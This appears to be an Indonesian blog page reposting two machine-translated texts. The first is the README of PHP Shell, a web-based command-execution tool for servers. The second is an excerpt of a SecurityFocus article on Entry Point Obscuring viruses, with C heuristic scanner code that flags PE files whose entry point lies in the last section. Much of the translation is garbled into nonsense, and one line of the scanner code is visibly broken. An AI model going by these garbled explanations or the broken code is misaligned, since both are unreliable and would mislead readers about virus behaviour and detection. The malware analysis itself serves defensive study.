PHP Shell adalah mudah untuk menginstal - men-download dan ekstrak itu dan mengkonfigurasi password. Hal ini dilakukan di config.php. Silakan baca file INSTALL yang disertakan untuk informasi rinci.

How to Use PHP Shell

Ketika kita mengarahkan browser Anda di PHP Shell Anda akan diminta untuk mengotentikasi diri sendiri. Secara default tidak ada username / password akan bekerja, jadi silakan pergi membaca INSTALL untuk informasi tentang cara menambahkan pengguna.

Kita sudah kembali? Baik. Masukkan username dan password dan tekan "Login".
Kita kemudian akan disajikan dengan cukup sederhana tidak banyak halaman yang berisi kecuali jendela besar dengan kursor berkedip-kedip di bagian bawah, menandakan bahwa itu siap untuk mematuhi perintah kita.

Tulis perintah dan tekan RET - atau sebaliknya, tekan tombol 'Execute Command' tombol jika Anda benar-benar ingin. Perintah akan dilaksanakan dan hasilnya akan menunjukkan di terminal. Kita dapat memasukkan perintah lain.

Untuk lebih tepatnya: terminal akan diperbarui dengan baris perintah yang baru saja kita dieksekusi, output dari perintah ke standard out (stdout), dan berikut ini bahwa setiap kesalahan keluaran dikirimkan ke stderr.

Perintah-perintah yang dijalankan relatif ke direktori kerja saat ini, yang ditulis di atas. Kita mengubah hal ini dengan normal 'cd' command.

Download

Versi terbaru dari PHP Shell adalah 2,1 dari 27 Desember 2005. Download sebagai

Phpshell-2.1.tar.bz2
Phpshell-2.1.zip

Tarball / zipfile berisi file-file ini:

phpshell.php: Ini adalah script yang Anda jalankan ketika Anda menggunakan PHP Shell.

config.php: Konfigurasi file dalam format INI.

pwhash.php: Password hashing script. Ini digunakan untuk menghasilkan password yang aman hashed yang harus anda gunakan untuk mencegah orang lain untuk mengenal sandi Anda dengan membaca file config.php.

ChangeLog: File ini menjelaskan perubahan-perubahan yang saya buat ke PHP Shell. Dengan membaca itu Anda akan selalu tahu kapan aku telah menambahkan fitur baru atau membuat bugfix, dan sifat dari fitur / bugfix.

README: Sekitar halaman ini.

INSTALL: Menjelaskan kepada anda bagaimana menginstal PHP Shell. Antara lain, ini menjelaskan bagaimana untuk mengubah proteksi password sehingga Anda dapat menggunakan PHP Shell.

Ingatlah bahwa sangat penting untuk memiliki PHP Shell dilindungi password, atau yang lain setiap orang akan dapat begitu mengintip ke file dan mungkin Anda juga dapat menghapus mereka! Harap meluangkan waktu untuk melindungi instalasi PHP Shell.

KEAMANAN
: Sebuah panduan tentang keamanan terpisah dengan PHP pada umumnya dan PHP Shell pada khususnya. Jangan lupa baca ini juga, terutama jika Anda mendapatkan kesalahan aneh kembali dari PHP Shell.

COPYING: Standar GNU GPL.


Sumber : phpshell.sourceforge.net

ReadMore

Kamis, 11 Februari 2010

Fighting EPO Viruses

Artikel pendek ini menjelaskan apa yang disebut Entry Point Obscuring (EPO)teknik pengkodean virus, terutama melalui analisis langsung Win32.CTX.Phage virus. Kita harus mengetahui dasar-dasar IA-32 perakitan dan unsur-unsur utama dari Portable Executable (PE) struktur file untuk memahami artikel ini. Kita harus meninjau deskripsi Win32.CTX.Phage ditulis oleh Peter Szor dan Wason Han, karena artikel ini tidak mencakup semua fitur dari virus.

Mengapa EPO dan Win32.CTX.Phage

Entry-point menghalangi virus sangat menarik karena sangat sulit sifat deteksi, desinfeksi dan penghapusan. Saat ini teknik EPO digunakan dalam berbagai cara, dalam artikel ini kita pilih Win32.CTX.Phage  yang sama lain seperti virus terkenal sebagai Win9x.Margburg (salah satu polimorfik Windows9x virus, yang pertama kali muncul di wildlist) dan Win9x.HPS.  Virus ini dikenal karena sulit untuk mendeteksi dan sulit untuk bersihkan. Khususnya CTX.Phage melibatkan banyak teknik yang membuat proses desinfeksi sangat sulit, bahkan setelah virus sepenuhnya dipaham.

Teknik Memahami Entry Point Obscuring (EPO)

Ketika virus menginfeksi file, ia harus mencari cara untuk mencapai DNS dan dihukum mati. Sebagian besar file PE infectors menggunakan cara yang paling umum untuk melakukan hal ini - mereka hanya mengubah catatan-titik aplikasi yang terinfeksi dan membuatnya menunjuk pada tubuh virus. Contoh ditunjukkan di bawah ini.

Original EXE                                                     Infected EXE 

Entry-point: 0x1000 (.code section)                 Entry-point: 0x6000 (.reloc section)

Aktivitas virus seperti itu sangat mudah untuk mendeteksi, sebagaimana biasanya menghasilkan file yang entry-point kode tinggal di luar bagian, dan karena itu ditandai sebagai mencurigakan oleh virus scanner. Berikut adalah beberapa contoh kode, yang mendeteksi jenis infeksi:

(checks if the 'entry-point section' is the last section):

// --- snip of scanner code ------------------------------------------------

...(snip)...

sections = pPE->FileHeader.NumberOfSections;

pSH = (PIMAGE_SECTION_HEADER)((DWORD)mymap+pMZ->e_lfanew + sizeof(IMAGE_NT_HEADERS));

   

   

    while (sections != 0) {

        if (IsBadReadPtr(&pSH,sizeof(PIMAGE_SECTION_HEADER)) == TRUE)

              {

            printf("[-] Error: Bad PE file\n");

            goto error_mode4;

        }

 

        char *secname=(char *) pSH->Name;

        if (secname == NULL) strcpy(secname,"NONAME");

 

        startrange=(DWORD) pSH->VirtualAddress + pPE->OptionalHeader.ImageBase;

        endrange=(DWORD) startrange + pSH->Misc.VirtualSize;

 

        ...(snip)...

 

        if (pSH->VirtualAddress <= pPE->OptionalHeader.AddressOfEntryPoint && \

                   pPE->OptionalHeader.AddressOfEntryPoint <>VirtualAddress +

                                      pSH->Misc.VirtualSize)

                  {

           

                      printf("[+] Checking call/jump requests from %s section (EP)\n",

                                            secname);

            pSHC = pSH;

        }

 

   

        pSH++;

        sections--;

    }

 

    pSH--;

    

    if (pSHC == NULL)

       {

        printf("[-] Error: invalid entrypoint\n");

        goto error_mode4;

    }

 

 

    printf("[+] Starting heuristics scan on %s section...\n\n",pSHC->Name);

 

    if (pSHC == pSH)

       {

        printf("[!] Alert: Entrypoint points to last section (%s) -> 0x%.08x\n",

                       pSH->Name,pPE->OptionalHeader.AddressOfEntryPoint +

                           pPE->OptionalHeader.ImageBase);

 

        printf("[!] Alert: The file may be infected!\n");

        printf("[+] No deep-scan action was performed\n");

        goto error_mode4;

    }

 

 

...(snip)...

// --- snip of scanner code ------------------------------------------------

 

Sebenarnya alasan mengapa teknik EPO dikembangkan adalah untuk menghindari pendeteksian virus scanner. An entry-point menutupi virus adalah virus yang tidak mendapatkan kontrol dari program host secara langsung. Biasanya, virus patch program host dengan melompat / panggil rutin, dan menerima kontrol seperti itu. Meskipun ada banyak variasi dari teknik EPO, dalam artikel ini kita akan melihat salah satu dari mereka secara rinci.

Sumber : Securityfocus

 


ReadMore